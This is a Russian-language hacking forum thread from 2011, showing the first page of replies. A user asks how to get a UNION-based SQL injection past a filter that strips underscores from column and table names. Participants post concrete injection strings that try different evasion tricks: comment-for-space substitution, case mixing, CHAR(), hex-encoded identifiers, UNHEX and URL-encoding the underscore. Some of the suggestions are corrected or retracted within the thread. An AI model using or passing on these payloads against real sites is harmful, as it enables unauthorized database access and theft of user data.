HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Фильтрация нижнего подчеркивания
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.12.2011, 16:19
listika
Guest
Сообщений: n/a
Провел на форуме:
3288

Репутация: 0
По умолчанию
Перерыла весь интернет, а толку ноль

Надеюсь, что здесь смогут подсказать.

Передаю запрос, но если там встречается нижнее подчеркивание, то оно вырезается и все остальное в запросе тоже. Получается все названия столбцов/таблиц с подчеркиванием не проходят.

Например запрос вида: id=-480+union+select+user_id,2+from+users+--

Отбросится все начиная с _id,2+from+users+--

И в итоге запрос не исполнится.

Подскажите, пожалуйста, можно как обойти фильтр или это уже не эксплуатируемая инъекция?
 
Ответить с цитированием

  #2  
Старый 24.12.2011, 16:21
aydin-ka
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906

Репутация: -14
По умолчанию
Используй Limit

id=-480+union+select+user_id,2+from+users+LIMIT+1,1 --

И каждый раз меняешь LIMIT 0,1 -- и .тд

P.S: кажется я вопроса не понял...

Обойти фильтр такими способами

1) вместо + пиши /**/

2) union = UnIoN

и .тд
 
Ответить с цитированием

  #3  
Старый 24.12.2011, 16:27
listika
Guest
Сообщений: n/a
Провел на форуме:
3288

Репутация: 0
По умолчанию
Видимо не поняли...

Такое проходит, без подчеркивания:

id=-480+union+select+user,2+from+users+--

А с подчеркиванием режет, не проходит:

id=-480+union+select+user_id,2+from+users+--

Все что после подчеркивания вырезается.

Остается id=-480+union+select+user

Лимит и др тут не причем.
 
Ответить с цитированием

  #4  
Старый 24.12.2011, 17:02
aydin-ka
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906

Репутация: -14
По умолчанию
Здесь режется _

Попробуйте закодировать. Функция CHAR()
 
Ответить с цитированием

  #5  
Старый 24.12.2011, 17:14
nikp
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386

Репутация: 1463
По умолчанию
Цитата:
Сообщение от listika  
listika said:
Передаю запрос, но если там встречается нижнее подчеркивание, то оно вырезается и все остальное в запросе тоже. Получается все названия столбцов/таблиц с подчеркиванием не проходят.
Подскажите, пожалуйста, можно как обойти фильтр или это уже не эксплуатируемая инъекция?
Предположим исходный запрос

Код:
Code:
select field_name from table_name
для MySql эквивалентным будет

Код:
Code:
select 0x6669656C645F6E616D65 from (select 0x7461626C655F6E616D65)k
а скрипт, который фильтрует, ищет подчеркивание (как символ "_"), т.е. посчитает запрос валидным.

=======

UPD

Совет не верный.
 
Ответить с цитированием

  #6  
Старый 24.12.2011, 17:18
aydin-ka
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906

Репутация: -14
По умолчанию
nikp а так можно? или опять резать будет?

id=-480+union+select+UNHEX(HEX(user_id)),2+from+users+--
 
Ответить с цитированием

  #7  
Старый 24.12.2011, 17:26
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию
Цитата:
Сообщение от aydin-ka  
aydin-ka said:
nikp
а так можно? или опять резать будет?
id=-480+union+select+UNHEX(HEX(user_id)),2+from+users+--
Будет резать. ТС, пробуй:

id=-480+union+select+unhex(0x757365725f6964),2+from+us ers+LIMIT+1,1 --
 
Ответить с цитированием

  #8  
Старый 24.12.2011, 17:37
listika
Guest
Сообщений: n/a
Провел на форуме:
3288

Репутация: 0
По умолчанию
Функция CHAR() никак не помогает, выводится константа раскодированная в итоге
 
Ответить с цитированием

  #9  
Старый 24.12.2011, 17:37
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию
Цитата:
Сообщение от nikp  
nikp said:
Предположим исходный запрос
Код:
Code:
select field_name from table_name
для MySql эквивалентным будет
Код:
Code:
select 0x6669656C645F6E616D65 from (select 0x7461626C655F6E616D65)k
а скрипт, который фильтрует, ищет подчеркивание (как символ "_"), т.е. посчитает запрос валидным.
хм, дык mysql будет воспринимать значение 0x6669656C645F6E616D65 как строку 'field_name', и в итоге вернет в скрипт не содержимое колонки field_name, с строку field_name

Я думаю в данном случае извратится с mysql не выйдет, и нужно искать способ обхода проверки символа _ в скрипте, например его урл-кодированным эквивалентом (%5f), или же другим способом.
 
Ответить с цитированием

  #10  
Старый 24.12.2011, 17:39
listika
Guest
Сообщений: n/a
Провел на форуме:
3288

Репутация: 0
По умолчанию
Цитата:
Сообщение от Expl0ited  
Expl0ited said:
хм, дык mysql будет воспринимать значение 0x6669656C645F6E616D65 как строку 'field_name', и в итоге вернет в скрипт не содержимое колонки field_name, с строку field_name
все верно, так и возвращает...
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ